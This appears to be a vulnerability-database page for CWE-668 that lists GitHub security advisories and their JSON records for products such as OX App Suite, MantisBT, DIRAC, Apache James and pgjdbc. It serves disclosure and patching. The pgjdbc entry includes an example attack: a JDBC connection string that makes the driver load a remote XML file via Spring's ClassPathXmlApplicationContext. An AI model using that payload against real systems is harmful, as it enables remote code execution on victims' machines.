Common Weakness Enumeration

CWE-668

Discouraged

Exposure of Resource to Wrong Sphere

Abstraction: Class · Status: Draft

The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.

1251 vulnerabilities reference this CWE, most recent first.

GHSA-V583-7M9J-97CW

Vulnerability from github – Published: 2022-05-24 19:21 – Updated: 2022-07-13 00:01
VLAI
Details

OX App Suite through 7.10.5 has Incorrect Access Control for retrieval of session information via the rampup action of the login API call.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-38376"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-22T09:15:00Z",
    "severity": "MODERATE"
  },
  "details": "OX App Suite through 7.10.5 has Incorrect Access Control for retrieval of session information via the rampup action of the login API call.",
  "id": "GHSA-v583-7m9j-97cw",
  "modified": "2022-07-13T00:01:34Z",
  "published": "2022-05-24T19:21:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38376"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/fulldisclosure/2021/Nov/43"
    },
    {
      "type": "WEB",
      "url": "https://www.open-xchange.com"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/165038/OX-App-Suite-7.10.5-Cross-Site-Scripting-Information-Disclosure.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V5Q9-W576-R6PH

Vulnerability from github – Published: 2022-12-06 09:30 – Updated: 2022-12-07 21:30
VLAI
Details

In wlan driver, there is a possible missing permission check, This could lead to local information disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-42766"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-668",
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-06T07:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In wlan driver, there is a possible missing permission check, This could lead to local information disclosure.",
  "id": "GHSA-v5q9-w576-r6ph",
  "modified": "2022-12-07T21:30:30Z",
  "published": "2022-12-06T09:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42766"
    },
    {
      "type": "WEB",
      "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1599588060988411006"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V63V-32VM-PX2M

Vulnerability from github – Published: 2022-01-31 00:00 – Updated: 2023-08-08 15:31
VLAI
Details

Adenza AxiomSL ControllerView through 10.8.1 is vulnerable to user enumeration. An attacker can identify valid usernames on the platform because a failed login attempt produces a different error message when the username is valid.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-24032"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-30T01:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Adenza AxiomSL ControllerView through 10.8.1 is vulnerable to user enumeration. An attacker can identify valid usernames on the platform because a failed login attempt produces a different error message when the username is valid.",
  "id": "GHSA-v63v-32vm-px2m",
  "modified": "2023-08-08T15:31:37Z",
  "published": "2022-01-31T00:00:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24032"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jdordonezn/CVE-2022-24032/issues/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V642-MH27-8J6M

Vulnerability from github – Published: 2023-10-17 14:20 – Updated: 2025-08-11 14:48
VLAI
Summary
MantisBT may disclose project names to unauthorized users
Details

Impact

Due to insufficient access-level checks on the Wiki redirection page, any user can reveal private Projects' names, by accessing wiki.php with sequentially incremented IDs.

Patches

The vulnerability has been fixed in MantisBT version 2.25.8 (https://github.com/mantisbt/mantisbt/commit/65c44883f9d24f3ccef066fb523c93d8fdd7afc1).

Workarounds

Disable wiki integration ( $g_wiki_enable = OFF;)

References

  • https://mantisbt.org/bugs/view.php?id=32981
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.25.7"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "mantisbt/mantisbt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.25.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-44394"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-17T14:20:36Z",
    "nvd_published_at": "2023-10-16T22:15:12Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nDue to insufficient access-level checks on the Wiki redirection page, any user can reveal private Projects\u0027 names, by accessing wiki.php with sequentially incremented IDs.\n\n### Patches\nThe vulnerability has been fixed in MantisBT version 2.25.8 (https://github.com/mantisbt/mantisbt/commit/65c44883f9d24f3ccef066fb523c93d8fdd7afc1).\n\n### Workarounds\nDisable wiki integration ( `$g_wiki_enable = OFF;`)\n\n### References\n- https://mantisbt.org/bugs/view.php?id=32981",
  "id": "GHSA-v642-mh27-8j6m",
  "modified": "2025-08-11T14:48:38Z",
  "published": "2023-10-17T14:20:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-v642-mh27-8j6m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44394"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mantisbt/mantisbt/commit/65c44883f9d24f3ccef066fb523c93d8fdd7afc1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mantisbt/mantisbt"
    },
    {
      "type": "WEB",
      "url": "https://mantisbt.org/bugs/view.php?id=32981"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "MantisBT may disclose project names to unauthorized users "
}

GHSA-V6F3-GH5H-MQWX

Vulnerability from github – Published: 2024-04-09 15:52 – Updated: 2026-01-05 19:05
VLAI
Summary
DIRAC: Unauthorized users can read proxy contents during generation
Details

Impact

During the proxy generation process (e.g., when using dirac-proxy-init) it is possible for unauthorized users on the same machine to gain read access to the proxy. This allows the user to then perform any action that is possible with the original proxy.

This vulnerability only exists for a short period of time (sub-millsecond) during the generation process.

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Setting the X509_USER_PROXY environment variable to a path that is inside a directory that is only readable to the current user avoids the potential risk. After the file has been written it can be safely copied to the standard location (/tmp/x509up_uNNNN).

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "DIRAC"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.0.41"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-29905"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-09T15:52:17Z",
    "nvd_published_at": "2024-04-09T17:16:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nDuring the proxy generation process (e.g., when using `dirac-proxy-init`) it is possible for unauthorized users on the same machine to gain read access to the proxy. This allows the user to then perform any action that is possible with the original proxy.\n\nThis vulnerability only exists for a short period of time (sub-millsecond) during the generation process.\n\n### Patches\n\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n\nSetting the `X509_USER_PROXY` environment variable to a path that is inside a directory that is only readable to the current user avoids the potential risk. After the file has been written it can be safely copied to the standard location (`/tmp/x509up_uNNNN`).\n\n### References",
  "id": "GHSA-v6f3-gh5h-mqwx",
  "modified": "2026-01-05T19:05:03Z",
  "published": "2024-04-09T15:52:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-v6f3-gh5h-mqwx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/DIRACGrid/DIRAC/commit/1faa709341969a6321e29c843ca94039d33b2c3d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/DIRACGrid/DIRAC"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "DIRAC: Unauthorized users can read proxy contents during generation"
}

GHSA-V6VP-62VC-84QW

Vulnerability from github – Published: 2023-01-06 12:31 – Updated: 2023-01-12 16:48
VLAI
Summary
Apache James server allows an attacker with local access to access private user data in transit
Details

Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. Vulnerable components includes the SMTP stack and IMAP APPEND command. This issue affects Apache James server version 3.7.2 and prior versions.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.james:james-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-45935"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-319",
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-09T20:12:10Z",
    "nvd_published_at": "2023-01-06T10:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. Vulnerable components includes the SMTP stack and IMAP APPEND command. This issue affects Apache James server version 3.7.2 and prior versions.",
  "id": "GHSA-v6vp-62vc-84qw",
  "modified": "2023-01-12T16:48:58Z",
  "published": "2023-01-06T12:31:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45935"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/james-project/commit/b5580d13d6c74ecbf647127eff1a3ac1086f5493"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/james-project"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/j61fo8xc1rxtofrn8vc33whx35s9cj1d"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache James server allows an attacker with local access to access private user data in transit"
}

GHSA-V792-6MC6-G855

Vulnerability from github – Published: 2021-12-04 00:00 – Updated: 2023-08-08 15:31
VLAI
Details

IBM Cognos Analytics 11.1.7 and 11.2.0 could be vulnerable to client side vulnerabilties due to a web response specifying an incorrect content type. IBM X-Force ID: 201091

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-29719"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-03T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "IBM Cognos Analytics 11.1.7 and 11.2.0 could be vulnerable to client side vulnerabilties due to a web response specifying an incorrect content type. IBM X-Force ID: 201091",
  "id": "GHSA-v792-6mc6-g855",
  "modified": "2023-08-08T15:31:24Z",
  "published": "2021-12-04T00:00:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29719"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201091"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20211223-0006"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6520510"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V79C-W8QR-CHQ9

Vulnerability from github – Published: 2021-12-21 00:00 – Updated: 2023-08-08 15:31
VLAI
Details

Zoho ManageEngine PAM360 before build 5303 allows attackers to modify a few aspects of application state because of a filter bypass in which authentication is not required.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-44525"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-20T16:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Zoho ManageEngine PAM360 before build 5303 allows attackers to modify a few aspects of application state because of a filter bypass in which authentication is not required.",
  "id": "GHSA-v79c-w8qr-chq9",
  "modified": "2023-08-08T15:31:26Z",
  "published": "2021-12-21T00:00:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44525"
    },
    {
      "type": "WEB",
      "url": "https://pitstop.manageengine.com/portal/en/community/topic/title-security-advisory-for-cve-2021-44525-authentication-bypass-vulnerability-in-manageengine-pam360"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V79V-2CRM-C7VH

Vulnerability from github – Published: 2022-05-24 19:07 – Updated: 2022-05-24 19:07
VLAI
Details

Information exposure vulnerability in Samsung Members prior to versions 2.4.85.11 in Android O(8.1) and below, and 3.9.10.11 in Android P(9.0) and above allows untrusted applications to access chat data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-25432"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-08T14:15:00Z",
    "severity": "LOW"
  },
  "details": "Information exposure vulnerability in Samsung Members prior to versions 2.4.85.11 in Android O(8.1) and below, and 3.9.10.11 in Android P(9.0) and above allows untrusted applications to access chat data.",
  "id": "GHSA-v79v-2crm-c7vh",
  "modified": "2022-05-24T19:07:15Z",
  "published": "2022-05-24T19:07:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25432"
    },
    {
      "type": "WEB",
      "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2021\u0026month=7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-V7WG-CPWC-24M4

Vulnerability from github – Published: 2022-02-02 00:04 – Updated: 2022-08-12 13:14
VLAI
Summary
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
Details

Impact

pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.

However, the driver did not verify if the class implements the expected interface before instantiating the class.

Here's an example attack using an out-of-the-box class from Spring Framework:

DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");

The first impacted version is REL9.4.1208 (it introduced socketFactory connection property)

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.postgresql:postgresql"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.4.1208"
            },
            {
              "fixed": "42.2.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.postgresql:postgresql"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "42.3.0"
            },
            {
              "fixed": "42.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-21724"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665",
      "CWE-668",
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-02-01T22:40:00Z",
    "nvd_published_at": "2022-02-02T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\npgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.\n\nHowever, the driver did not verify if the class implements the expected interface before instantiating the class.\n\nHere\u0027s an example attack using an out-of-the-box class from Spring Framework:\n\n```\nDriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext\u0026socketFactoryArg=http://target/exp.xml\");\n```\n\nThe first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)",
  "id": "GHSA-v7wg-cpwc-24m4",
  "modified": "2022-08-12T13:14:09Z",
  "published": "2022-02-02T00:04:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21724"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pgjdbc/pgjdbc"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220311-0005"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5196"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pgjdbc Does Not Check Class Instantiation when providing Plugin Classes"
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.